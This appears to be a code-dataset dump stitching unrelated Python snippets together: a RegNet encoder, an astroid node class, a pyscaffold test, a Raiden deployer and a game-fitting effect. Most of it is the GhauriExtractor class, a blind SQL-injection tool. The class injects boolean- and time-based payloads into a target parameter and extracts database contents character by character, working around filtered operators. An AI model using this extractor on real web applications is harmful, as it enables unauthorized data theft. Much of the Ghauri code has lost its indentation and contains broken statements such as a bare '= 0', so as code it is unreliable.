code stringlengths 281 23.7M |
|---|
class RegNetEncoder(nn.Module):
    """Stack of RegNet stages that maps embeddings to the final hidden state."""

    def __init__(self, config: RegNetConfig):
        super().__init__()
        # The first stage consumes the embedding output and may optionally
        # downsample it, depending on the configuration.
        first_stride = 2 if config.downsample_in_first_stage else 1
        stages = [
            RegNetStage(
                config,
                config.embedding_size,
                config.hidden_sizes[0],
                stride=first_stride,
                depth=config.depths[0],
            )
        ]
        # Each subsequent stage connects one hidden size to the next.
        stage_io = zip(config.hidden_sizes, config.hidden_sizes[1:])
        for (in_ch, out_ch), stage_depth in zip(stage_io, config.depths[1:]):
            stages.append(RegNetStage(config, in_ch, out_ch, depth=stage_depth))
        self.stages = nn.ModuleList(stages)

    def forward(self, hidden_state: Tensor, output_hidden_states: bool = False, return_dict: bool = True) -> BaseModelOutputWithNoAttention:
        """Run every stage, optionally collecting each intermediate state.

        When ``output_hidden_states`` is True, the returned ``hidden_states``
        tuple contains the input to each stage plus the final output.
        """
        hidden_states = () if output_hidden_states else None
        for stage in self.stages:
            if hidden_states is not None:
                hidden_states = hidden_states + (hidden_state,)
            hidden_state = stage(hidden_state)
        if hidden_states is not None:
            hidden_states = hidden_states + (hidden_state,)
        if not return_dict:
            return tuple(v for v in (hidden_state, hidden_states) if v is not None)
        return BaseModelOutputWithNoAttention(last_hidden_state=hidden_state, hidden_states=hidden_states)
class AugAssign(_base_nodes.AssignTypeNode, _base_nodes.OperatorNode, _base_nodes.Statement):
    """An augmented assignment node, e.g. ``x += 4``."""

    _astroid_fields = ('target', 'value')
    _other_fields = ('op',)

    # target: the left-hand side being assigned to; value: the right-hand side.
    target: Name | Attribute | Subscript
    value: NodeNG

    def __init__(self, op: str, lineno: int, col_offset: int, parent: NodeNG, *, end_lineno: int | None, end_col_offset: int | None) -> None:
        # op is the full operator text including '=', e.g. '+='.
        self.op = op
        super().__init__(lineno=lineno, col_offset=col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset, parent=parent)

    def postinit(self, target: Name | Attribute | Subscript, value: NodeNG) -> None:
        """Attach the child nodes after construction."""
        self.target = target
        self.value = value

    # Assignment inference is delegated to the shared protocol implementation.
    assigned_stmts = protocols.assign_assigned_stmts

    def type_errors(self, context: InferenceContext | None = None):
        """Return the list of bad-binary-operation messages produced while
        inferring this node; empty when inference itself fails."""
        try:
            results = self._infer_augassign(context=context)
            return [result for result in results if isinstance(result, util.BadBinaryOperationMessage)]
        except InferenceError:
            return []

    def get_children(self):
        yield self.target
        yield self.value

    def _get_yield_nodes_skip_functions(self):
        yield from self.value._get_yield_nodes_skip_functions()
        yield from super()._get_yield_nodes_skip_functions()

    def _get_yield_nodes_skip_lambdas(self):
        yield from self.value._get_yield_nodes_skip_lambdas()
        yield from super()._get_yield_nodes_skip_lambdas()

    def _infer_augassign(self, context: InferenceContext | None = None) -> Generator[InferenceResult | util.BadBinaryOperationMessage, None, None]:
        """Infer the results of this augmented assignment expression.

        Pairs every inferred LHS value with every inferred RHS value and
        delegates to the binary-operation inference machinery.
        """
        context = context or InferenceContext()
        rhs_context = context.clone()
        lhs_iter = self.target.infer_lhs(context=context)
        rhs_iter = self.value.infer(context=rhs_context)
        for lhs, rhs in itertools.product(lhs_iter, rhs_iter):
            if any(isinstance(value, util.UninferableBase) for value in (rhs, lhs)):
                # Either side is unknown: nothing more can be deduced.
                yield util.Uninferable
                return
            try:
                yield from self._infer_binary_operation(left=lhs, right=rhs, binary_opnode=self, context=context, flow_factory=self._get_aug_flow)
            except _NonDeducibleTypeHierarchy:
                yield util.Uninferable

    # NOTE(review): in the scraped source the two names below appeared as
    # bare class-level statements (and the last line carried a stray ' |'
    # artifact). Upstream astroid applies these as decorators on _infer
    # (raise_if_nothing_inferred / path_wrapper); restored as decorator
    # syntax here -- confirm against the original module.
    @_if_nothing_inferred
    @_wrapper
    def _infer(self: nodes.AugAssign, context: InferenceContext | None = None, **kwargs: Any) -> Generator[InferenceResult, None, None]:
        return self._filter_operation_errors(self._infer_augassign, context, util.BadBinaryOperationMessage)
def test_update_none_param(tmpfolder):
    """A ``None``-valued extension parameter must not break the setup.cfg update."""
    # Start from a minimal (whitespace-indented, hence "invalid") config file.
    cfg_text = ' [metadata]\n [pyscaffold]\n version = 4\n '
    Path(tmpfolder, 'setup.cfg').write_text(dedent(cfg_text))
    extensions = [Object(name='x_foo_bar_x', persist=True)]
    _, opts = actions.get_default_options({}, {'extensions': extensions})
    # Force the persisted extension parameter to None before updating.
    opts['x_foo_bar_x_param'] = None
    update.update_setup_cfg({}, opts)
    # The update should succeed and leave a non-empty file behind.
    assert Path(tmpfolder, 'setup.cfg').read_text()
def deploy_one_to_n(
    user_deposit_deploy_result: Callable[[], UserDeposit],
    service_registry_deploy_result: Callable[[], ServiceRegistry],
    deploy_client: JSONRPCClient,
    contract_manager: ContractManager,
    proxy_manager: ProxyManager,
    chain_id: ChainID,
) -> OneToN:
    """Deploy the OneToN contract and return its proxy.

    The UserDeposit and ServiceRegistry deployments are resolved first so
    their addresses can be passed to the OneToN constructor.
    """
    user_deposit = user_deposit_deploy_result()
    service_registry = service_registry_deploy_result()
    constructor_args = [user_deposit.address, chain_id, service_registry.address]
    contract, receipt = deploy_client.deploy_single_contract(
        contract_name=CONTRACT_ONE_TO_N,
        contract=contract_manager.get_contract(CONTRACT_ONE_TO_N),
        constructor_parameters=constructor_args,
    )
    one_to_n_address = OneToNAddress(to_canonical_address(contract.address))
    return proxy_manager.one_to_n(one_to_n_address, BlockNumber(receipt['blockNumber']))
class Effect91(BaseEffect):
    """Passive effect: boosts the damage multiplier of Energy Weapon modules."""

    type = 'passive'

    def handler(fit, module, context, projectionRange, **kwargs):
        # Apply the module's own damageMultiplier to every fitted item whose
        # group is 'Energy Weapon', with stacking penalties.
        bonus = module.getModifiedItemAttr('damageMultiplier')
        fit.modules.filteredItemMultiply(
            lambda mod: mod.item.group.name == 'Energy Weapon',
            'damageMultiplier',
            bonus,
            stackingPenalties=True,
            **kwargs,
        )
class GhauriExtractor:
    """Blind SQL-injection data extractor.

    Holds the injection vectors and extraction options; the individual
    search strategies are implemented as methods on this class.
    """

    def __init__(self, vectors='', is_string=False, skip_urlencoding=False, filepaths=None):
        # Persist the caller-supplied configuration as instance attributes.
        options = (
            ('vectors', vectors),
            ('is_string', is_string),
            ('skip_urlencoding', skip_urlencoding),
            ('filepaths', filepaths),
        )
        for attr_name, attr_value in options:
            setattr(self, attr_name, attr_value)
def _check_operator(self, url, data, vector, parameter, headers, base, injection_type, proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack01=None, match_string=None, not_match_string=None, vector_type=None, text_only=False, retry=3):
GuessUsing = collections.namedtuple('GuessUsing', ['ok', 'binary_search', 'in_based_search', 'linear_search', 'between_based_search', 'msg'])
binary_search = False
in_based_search = False
linear_search = False
between_based_search = False
retry_on_error = 0
= 0
timesec = conf.timesec
error_msg = None
_temp = GuessUsing(ok=False, binary_search=binary_search, in_based_search=in_based_search, linear_search=linear_search, between_based_search=between_based_search, msg=None)
expressions = [{'expression': vector.replace('[INFERENCE]', '6590>6420').replace('[SLEEPTIME]', f'{timesec}'), 'type': 'binary_search'}, {'expression': vector.replace('[INFERENCE]', '6590 NOT BETWEEN 0 AND 6420').replace('[SLEEPTIME]', f'{timesec}'), 'type': 'between_based_search'}, {'expression': vector.replace('[INFERENCE]', '(SELECT(45))IN(10,45,60)').replace('[SLEEPTIME]', f'{timesec}'), 'type': 'in_based_search'}, {'expression': vector.replace('[INFERENCE]', '09845=9845').replace('[SLEEPTIME]', f'{timesec}'), 'type': 'linear_search'}]
start = 0
operators = {'greater': 'binary_search', 'between': 'between_based_search', 'in': 'in_based_search', 'equal': 'linear_search'}
operator = None
if (conf.fetch_using and (conf.fetch_using in list(operators.keys()))):
operator = operators.get(conf.fetch_using, None)
if operator:
logger.debug(f"Ghauri will based data retrieval using '{conf.fetch_using}' openator")
end = len(expressions)
while (start < end):
entry = expressions[start]
expression = entry.get('expression')
_type = entry.get('type')
if (operator and (_type != operator)):
start += 1
continue
logger.payload(f'{expression}')
if (retry_on_error >= conf.retry):
start += 1
if (delay > 0):
time.sleep(delay)
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
logger.debug(f'sleep time: {timesec}, response time: {attack.response_time}')
if (attack01 and (vector_type == 'boolean_vector')):
bool_retval = check_boolean_responses(base, attack, attack01, match_string=match_string)
result = bool_retval.vulnerable
if result:
if (_type == 'binary_search'):
_temp = GuessUsing(ok=True, binary_search=True, in_based_search=in_based_search, linear_search=linear_search, between_based_search=between_based_search, msg='')
if (_type == 'between_based_search'):
msg = "it appears that the character '>' is filtered by the back-end server. ghauri will based data retrieval on BETWEEN operator"
if conf.fetch_using:
msg = ''
_temp = GuessUsing(ok=True, binary_search=binary_search, in_based_search=in_based_search, linear_search=linear_search, between_based_search=True, msg=msg)
if (_type == 'in_based_search'):
msg = ("it appears that the character '>' and 'BETWEEN' operator is filtered by the back-end server. ghauri will based data retrieval on IN() operator",)
if conf.fetch_using:
msg = ''
_temp = GuessUsing(ok=True, binary_search=binary_search, in_based_search=True, linear_search=linear_search, between_based_search=between_based_search, msg=msg)
if (_type == 'linear_search'):
msg = ("it appears that the character '>' and the operator(s) 'IN, BETWEEN' are filtered by the back-end server. ghauri will based data retrieval on '=' operator, You are advised to use --delay=3 in this case",)
if conf.fetch_using:
msg = ''
_temp = GuessUsing(ok=True, binary_search=binary_search, in_based_search=in_based_search, linear_search=True, between_based_search=between_based_search, msg=msg)
break
if (vector_type == 'time_vector'):
response_time = attack.response_time
if (response_time >= timesec):
if (_type == 'binary_search'):
_temp = GuessUsing(ok=True, binary_search=True, in_based_search=in_based_search, linear_search=linear_search, between_based_search=between_based_search, msg='')
if (_type == 'between_based_search'):
msg = "it appears that the character '>' is filtered by the back-end server. ghauri will based data retrieval on BETWEEN operator"
if conf.fetch_using:
msg = ''
_temp = GuessUsing(ok=True, binary_search=binary_search, in_based_search=in_based_search, linear_search=linear_search, between_based_search=True, msg=msg)
if (_type == 'in_based_search'):
msg = ("it appears that the character '>' and 'BETWEEN' operator is filtered by the back-end server. ghauri will based data retrieval on IN() operator",)
if conf.fetch_using:
msg = ''
_temp = GuessUsing(ok=True, binary_search=binary_search, in_based_search=True, linear_search=linear_search, between_based_search=between_based_search, msg=msg)
if (_type == 'linear_search'):
msg = ("it appears that the character '>' and the operator(s) 'IN, BETWEEN' are filtered by the back-end server. ghauri will based data retrieval on '=' operator, You are advised to use --delay=3 in this case",)
if conf.fetch_using:
msg = ''
_temp = GuessUsing(ok=True, binary_search=binary_search, in_based_search=in_based_search, linear_search=True, between_based_search=between_based_search, msg=msg)
break
start += 1
except KeyboardInterrupt as error:
logger.warning('user aborted during data extraction phase')
quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
if (quest and (quest == 'e')):
raise error
if (quest and (quest == 'q')):
logger.error('user quit')
logger.end('ending')
exit(0)
except ConnectionAbortedError as e:
logger.critical(f'connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
retry_on_error += 1
except ConnectionRefusedError as e:
logger.critical(f'connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
retry_on_error += 1
except ConnectionResetError as e:
logger.critical(f'connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
retry_on_error += 1
except Exception as error:
logger.critical(f'error {error}, during operator check phase. Ghauri is going to retry')
retry_on_error += 1
if _temp.ok:
if _temp.msg:
logger.warning(_temp.msg)
return _temp
def validate_character(self, url, data, vector, parameter, headers, base, injection_type, proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack01=None, match_string=None, not_match_string=None, suppress_output=False, query_check=False, identified_character=None, vector_type=None, queryable=None, offset=None, expression_payload=None, text_only=False, retry=3, code=None, *args, **kwargs):
is_valid = False
retry_on_error = 0
= 0
error_msg = None
if identified_character:
for i in range(1, (retry + 1)):
if (delay > 0):
time.sleep(delay)
condition = expression_payload.format(query=queryable, position=offset, char=ord(identified_character))
if (vector_type == 'time_vector'):
if (conf.fetch_using and (conf.fetch_using.lower() == 'between')):
condition = replace_with(string=condition, character='=', replace_with=' NOT BETWEEN 0 AND ')
else:
condition = replace_with(string=condition, character='=', replace_with='!=')
if (vector_type == 'boolean_vector'):
if (conf.fetch_using and (conf.fetch_using.lower() == 'between')):
condition = replace_with(string=condition, character='=', replace_with=' BETWEEN 0 AND ')
expression = vector.replace('[INFERENCE]', f'{condition}').replace('[SLEEPTIME]', f'{timesec}')
sleep_time = conf.timesec
logger.payload(f'{expression}')
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
logger.debug(f'sleep time: {sleep_time}, response time: {attack.response_time}')
if (attack01 and (vector_type == 'boolean_vector')):
bool_retval = check_boolean_responses(base, attack, attack01, match_string=match_string, not_match_string=not_match_string, code=code, text_only=text_only)
result = bool_retval.vulnerable
if result:
is_valid = True
logger.debug('character is valid.')
if (vector_type == 'time_vector'):
response_time = attack.response_time
vulnerable = bool((response_time >= sleep_time))
if (not vulnerable):
logger.debug('character is valid.')
is_valid = True
break
except KeyboardInterrupt as error:
logger.warning('user aborted during data extraction phase')
quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
if (quest and (quest == 'e')):
raise error
if (quest and (quest == 'q')):
logger.error('user quit')
logger.end('ending')
exit(0)
except ConnectionAbortedError as e:
logger.critical(f'connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
retry_on_error += 1
except ConnectionRefusedError as e:
logger.critical(f'connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
retry_on_error += 1
except ConnectionResetError as e:
logger.critical(f'connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
retry_on_error += 1
except Exception as error:
logger.critical(f'error {error}, during detection phase. Ghauri is going to retry')
retry_on_error += 1
return is_valid
def _search_using_in_operator(self, url, data, vector, parameter, headers, base, injection_type, delay=0, timesec=5, timeout=30, proxy=None, attack01=None, code=None, match_string=None, not_match_string=None, text_only=False, is_multipart=False, suppress_output=False, query_check=False, minimum=None, maximum=None, offset=0, expression_payload=None, queryable=None, chars='', vector_type=None, retry=3, *args, **kwargs):
if (not minimum):
minimum = 32
if (not maximum):
maximum = 127
is_found = False
character = ''
= 0
error_msg = None
retry_on_error = 0
if (not conf.threads):
logger.progress(f'retrieved: {chars}')
if conf.threads:
chars = ''.join([str(i) for i in collections.OrderedDict(sorted(conf._thread_chars_query.items())).values()])
logger.progress(f'retrieved: {chars}')
sleep_time = conf.timesec
def chunks(lst, n):
for i in range(0, len(lst), n):
(yield lst[i:(i + n)])
gen = list(range(minimum, (maximum + 1)))
list_split_by = (26 if (len(gen) >= 26) else len(gen))
while (not is_found):
sorted_ascii_list = list(chunks(sorted([str(i) for i in range(minimum, (maximum + 1))]), list_split_by))
index = 0
while (index < len(sorted_ascii_list)):
if (delay > 0):
time.sleep(delay)
characters_list = sorted_ascii_list[index]
in_payload = (('(' + ','.join(characters_list)) + ')')
condition = expression_payload.format(query=queryable, position=offset, char=in_payload)
condition = replace_with(string=condition, character='=', replace_with='IN')
expression = vector.replace('[INFERENCE]', f'{condition}').replace('[SLEEPTIME]', f'{sleep_time}')
logger.payload(f'{expression}')
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
response_time = attack.response_time
logger.debug(f'sleep time: {sleep_time}, response time: {response_time}')
if (attack01 and (vector_type == 'boolean_vector')):
bool_retval = check_boolean_responses(base, attack, attack01, match_string=match_string, not_match_string=not_match_string, text_only=text_only)
result = bool_retval.vulnerable
if result:
characters_list = sorted([int(i) for i in characters_list])
minimum = characters_list[0]
maximum = characters_list[(- 1)]
list_split_by = (len(characters_list) // 2)
if (len(characters_list) == 1):
character = characters_list.pop()
character = chr(int(character))
if conf.threads:
conf._thread_chars_query.update({offset: character})
chars = ''.join([str(i) for i in collections.OrderedDict(conf._thread_chars_query.items()).values()])
logger.progress(f'retrieved: {chars}')
is_found = True
break
else:
index += 1
if (vector_type == 'time_vector'):
if (response_time >= sleep_time):
characters_list = sorted([int(i) for i in characters_list])
minimum = characters_list[0]
maximum = characters_list[(- 1)]
list_split_by = (len(characters_list) // 2)
if (len(characters_list) == 1):
character = characters_list.pop()
character = chr(int(character))
is_found = True
break
else:
index += 1
except KeyboardInterrupt as error:
logger.warning('user aborted during data extraction phase')
quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
if (quest and (quest == 'e')):
raise error
if (quest and (quest == 'q')):
logger.error('user quit')
logger.end('ending')
exit(0)
except ConnectionAbortedError as e:
logger.critical(f'connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
retry_on_error += 1
except ConnectionRefusedError as e:
logger.critical(f'connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
retry_on_error += 1
except ConnectionResetError as e:
logger.critical(f'connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
retry_on_error += 1
except Exception as error:
logger.critical(f'error {error}, during detection phase. Ghauri is going to retry')
retry_on_error += 1
return character
def _search_using_between_operator(self, url, data, vector, parameter, headers, base, injection_type, delay=0, timesec=5, timeout=30, proxy=None, attack01=None, code=None, match_string=None, not_match_string=None, text_only=False, is_multipart=False, suppress_output=False, query_check=False, minimum=None, maximum=None, offset=0, expression_payload=None, queryable=None, chars='', vector_type=None, retry=3, *args, **kwargs):
if (not minimum):
minimum = 32
if (not maximum):
maximum = 127
ascii_char = 0
is_found = False
character = ''
= 0
error_msg = None
retry_on_error = 0
if (not conf.threads):
logger.progress(f'retrieved: {chars}')
if conf.threads:
chars = ''.join([str(i) for i in collections.OrderedDict(sorted(conf._thread_chars_query.items())).values()])
logger.progress(f'retrieved: {chars}')
sleep_time = conf.timesec
while (not is_found):
if (conf._readtimout_counter >= 3):
if conf.rto_warning:
if (not conf.rtom_warning):
choice = logger.read_input('Ghauri detected read timeout multiple time(s). Do you want to continue? [y/N] ')
if (choice == 'n'):
logger.end('ending')
exit(0)
conf.rtom_warning = True
if (not conf.rto_warning):
msgrto = ''
if (vector_type == 'time_vector'):
msgrto = ", It is recommended to set high value of option(s) '--time-sec', increase delay between request(s) with an option '--delay'"
if (vector_type == 'boolean_vector'):
msgrto = ", It is recommended to set high value of option(s) '--timeout' and also increase delay between each http request with an option '--delay'"
logger.warning(f"Ghauri detected read timout '{conf._readtimout_counter}' time(s){msgrto}.")
conf.rto_warning = True
conf._readtimout_counter = 0
if (delay > 0):
time.sleep(delay)
ascii_char = int(((minimum + maximum) / 2))
if ((minimum == ascii_char) & (maximum == ascii_char)):
is_found = True
character = str(chr(ascii_char))
if (not conf.threads):
logger.progress(f'retrieved: {chars}{character}')
if conf.threads:
conf._thread_chars_query.update({offset: character})
chars = ''.join([str(i) for i in collections.OrderedDict(conf._thread_chars_query.items()).values()])
logger.progress(f'retrieved: {chars}')
break
condition = expression_payload.format(query=queryable, position=offset, char=ascii_char)
condition = replace_with(string=condition, character='=', replace_with=' NOT BETWEEN 0 AND ')
expression = vector.replace('[INFERENCE]', f'{condition}').replace('[SLEEPTIME]', f'{sleep_time}')
logger.payload(f'{expression}')
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
response_time = attack.response_time
logger.debug(f'sleep time: {sleep_time}, response time: {response_time}')
if (attack01 and (vector_type == 'boolean_vector')):
bool_retval = check_boolean_responses(base, attack, attack01, code=code, match_string=match_string, not_match_string=not_match_string, text_only=text_only)
result = bool_retval.vulnerable
if result:
minimum = (ascii_char + 1)
maximum = maximum
else:
minimum = minimum
maximum = ascii_char
if (vector_type == 'time_vector'):
if (response_time >= sleep_time):
minimum = (ascii_char + 1)
maximum = maximum
else:
minimum = minimum
maximum = ascii_char
except KeyboardInterrupt as error:
if conf.threads:
raise error
logger.warning('user aborted during data extraction phase')
quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
if (quest and (quest == 'e')):
raise error
if (quest and (quest == 'q')):
logger.error('user quit')
logger.end('ending')
exit(0)
except ConnectionAbortedError as e:
logger.critical(f'connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
retry_on_error += 1
except ConnectionRefusedError as e:
logger.critical(f'connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
retry_on_error += 1
except ConnectionResetError as e:
logger.critical(f'connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
retry_on_error += 1
except Exception as error:
logger.critical(f'error {error}, during detection phase. Ghauri is going to retry')
retry_on_error += 1
return character
def _binary_search(self, url, data, vector, parameter, headers, base, injection_type, delay=0, timesec=5, timeout=30, proxy=None, attack01=None, code=None, match_string=None, not_match_string=None, text_only=False, is_multipart=False, suppress_output=False, query_check=False, minimum=None, maximum=None, offset=0, expression_payload=None, queryable=None, chars='', vector_type=None, retry=3, *args, **kwargs):
if (not minimum):
minimum = 32
if (not maximum):
maximum = 127
ascii_char = 0
is_found = False
character = ''
= 0
error_msg = None
retry_on_error = 0
if (not conf.threads):
logger.progress(f'retrieved: {chars}')
if conf.threads:
chars = ''.join([str(i) for i in collections.OrderedDict(sorted(conf._thread_chars_query.items())).values()])
logger.progress(f'retrieved: {chars}')
sleep_time = conf.timesec
while (not is_found):
if (conf._readtimout_counter >= 3):
if conf.rto_warning:
if (not conf.rtom_warning):
choice = logger.read_input('Ghauri detected read timeout multiple time(s). Do you want to continue? [y/N] ')
if (choice == 'n'):
logger.end('ending')
exit(0)
conf.rtom_warning = True
if (not conf.rto_warning):
msgrto = ''
if (vector_type == 'time_vector'):
msgrto = ", It is recommended to set high value of option(s) '--time-sec', increase delay between request(s) with an option '--delay'"
if (vector_type == 'boolean_vector'):
msgrto = ", It is recommended to set high value of option(s) '--timeout' and also increase delay between each http request with an option '--delay'"
logger.warning(f"Ghauri detected read timout '{conf._readtimout_counter}' time(s){msgrto}.")
conf.rto_warning = True
conf._readtimout_counter = 0
if (delay > 0):
time.sleep(delay)
ascii_char = int(((minimum + maximum) / 2))
if ((minimum == ascii_char) & (maximum == ascii_char)):
is_found = True
character = str(chr(ascii_char))
if (not conf.threads):
logger.progress(f'retrieved: {chars}{character}')
if conf.threads:
conf._thread_chars_query.update({offset: character})
chars = ''.join([str(i) for i in collections.OrderedDict(conf._thread_chars_query.items()).values()])
logger.progress(f'retrieved: {chars}')
break
condition = expression_payload.format(query=queryable, position=offset, char=ascii_char)
condition = replace_with(string=condition, character='=', replace_with='>')
expression = vector.replace('[INFERENCE]', f'{condition}').replace('[SLEEPTIME]', f'{sleep_time}')
logger.payload(f'{expression}')
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
response_time = attack.response_time
logger.debug(f'sleep time: {sleep_time}, response time: {response_time}')
if (attack01 and (vector_type == 'boolean_vector')):
bool_retval = check_boolean_responses(base, attack, attack01, code=code, match_string=match_string, not_match_string=not_match_string, text_only=text_only)
result = bool_retval.vulnerable
if result:
minimum = (ascii_char + 1)
maximum = maximum
else:
minimum = minimum
maximum = ascii_char
if (vector_type == 'time_vector'):
if (response_time >= sleep_time):
minimum = (ascii_char + 1)
maximum = maximum
else:
minimum = minimum
maximum = ascii_char
except KeyboardInterrupt as error:
if conf.threads:
raise error
logger.warning('user aborted during data extraction phase')
quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
if (quest and (quest == 'e')):
raise error
if (quest and (quest == 'q')):
logger.error('user quit')
logger.end('ending')
exit(0)
except ConnectionAbortedError as e:
logger.critical(f'connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
retry_on_error += 1
except ConnectionRefusedError as e:
logger.critical(f'connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
retry_on_error += 1
except ConnectionResetError as e:
logger.critical(f'connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
retry_on_error += 1
except Exception as error:
logger.critical(f'error {error}, during detection phase. Ghauri is going to retry')
retry_on_error += 1
return character
def _linear_search(self, url, data, vector, parameter, headers, injection_type, proxy=None, attack01=None, is_multipart=False, timeout=30, delay=0, timesec=5, match_string=None, not_match_string=None, text_only=False, suppress_output=False, expression_payload=None, queryable=None, chars='', offset=0, list_of_chars=None, vector_type=None, retry=3, base=None, *args, **kwargs):
character = ''
start = 0
end = len(list_of_chars)
= 0
error_msg = None
retry_on_error = 0
sleep_time = conf.timesec
while (start < end):
ascii_char = list_of_chars[start]
if (delay > 0):
time.sleep(delay)
logger.progress(f'retrieved: {chars}{ascii_char}')
condition = expression_payload.format(query=queryable, position=offset, char=ord(ascii_char))
expression = vector.replace('[INFERENCE]', f'{condition}').replace('[SLEEPTIME]', f'{sleep_time}')
logger.payload(f'{expression}')
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
start += 1
if (attack01 and (vector_type == 'boolean_vector')):
bool_retval = check_boolean_responses(base, attack, attack01, match_string=match_string, not_match_string=not_match_string, text_only=text_only)
result = bool_retval.vulnerable
if result:
character += str(ascii_char)
break
if (vector_type == 'time_vector'):
response_time = attack.response_time
logger.debug(f'sleep time: {sleep_time}, response time: {response_time}')
if (response_time >= sleep_time):
character += str(ascii_char)
break
except KeyboardInterrupt as error:
logger.warning('user aborted during data extraction phase')
quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
if (quest and (quest == 'e')):
raise error
if (quest and (quest == 'q')):
logger.error('user quit')
logger.end('ending')
exit(0)
except ConnectionAbortedError as e:
logger.critical(f'connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
retry_on_error += 1
except ConnectionRefusedError as e:
logger.critical(f'connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
retry_on_error += 1
except ConnectionResetError as e:
logger.critical(f'connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
retry_on_error += 1
except Exception as error:
logger.critical(f'error {error}, during detection phase. Ghauri is going to retry')
retry_on_error += 1
return character
    def fetch_noc(self, url, data, vector, parameter, headers, base, injection_type, payloads, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack01=None, code=None, match_string=None, not_match_string=None, suppress_output=False, text_only=False, vector_type=None):
        """Determine how many decimal digits the query-output length has.

        Tries each backend-specific digit-count template against each
        candidate query payload, probing digit counts 1..9, and returns
        ``(noc, working_query)`` where ``noc`` is the digit count (0 when
        nothing matched) and ``working_query`` is the payload that worked.
        """
        noc = 0
        working_query = ''
        logger.debug('fetching number of characters in length of query..')
        # Backend-specific templates; normalize a single template to a list.
        chars_extraction_payloads = NUMBER_OF_CHARACTERS_PAYLOADS.get(backend)
        if isinstance(chars_extraction_payloads, str):
            chars_extraction_payloads = [chars_extraction_payloads]
        for value in chars_extraction_payloads:
            is_noc_payload_found = False
            for entry in payloads:
                is_noc_found = False
                start_pos = 1
                stop = 10  # probe digit counts 1..9 only
                while (start_pos < stop):
                    if (delay > 0):
                        time.sleep(delay)
                    sleep_time = conf.timesec
                    condition = value.format(query=entry, char=start_pos)
                    expression = vector.replace('[INFERENCE]', f'{condition}').replace('[SLEEPTIME]', f'{sleep_time}')
                    logger.payload(f'{expression}')
                    try:
                        attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
                    except KeyboardInterrupt as error:
                        # No retry here: an interrupt during this phase ends the run.
                        logger.error('user aborted during number of characters in length query retrieval.')
                        logger.end('ending')
                        exit(0)
                    if (attack.status_code in [403, 406]):
                        # Probe blocked by a firewall; move to the next payload.
                        logger.debug('moving towards next payload in a list as current payload is restricted by firewall.')
                        break
                    if (attack01 and (vector_type == 'boolean_vector')):
                        bool_retval = check_boolean_responses(base, attack, attack01, code=code, match_string=match_string, not_match_string=not_match_string, text_only=text_only)
                        result = bool_retval.vulnerable
                        if result:
                            working_query = entry
                            logger.debug(f'retrieved number of characters in length query {start_pos}')
                            noc = start_pos
                            is_noc_found = True
                            break
                    if (vector_type == 'time_vector'):
                        response_time = attack.response_time
                        logger.debug(f'sleep time: {sleep_time}, response time: {response_time}')
                        if (response_time >= sleep_time):
                            working_query = entry
                            logger.debug(f'retrieved number of characters in length query {start_pos}')
                            noc = start_pos
                            is_noc_found = True
                            break
                    start_pos += 1
                # Propagate the inner success outward to stop both loops.
                if is_noc_found:
                    is_noc_payload_found = True
                    break
            if is_noc_payload_found:
                break
        return (noc, working_query)
def fetch_length(self, url, data, vector, parameter, headers, base, injection_type, payloads, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack01=None, code=None, match_string=None, not_match_string=None, suppress_output=False, query_check=False, text_only=False, vector_type=None):
    """Blindly extract the length of the current query's output.

    First determines how many digits the length value has (via fetch_noc),
    then extracts each digit one by one: a boolean-based binary search with
    a linear-search fallback for 'boolean_vector', or a time-based linear
    search for 'time_vector'. The digit range 48-58 passed to the binary
    search restricts guesses to ASCII '0'-'9'.

    Returns the extracted length as an int (0 when it could not be
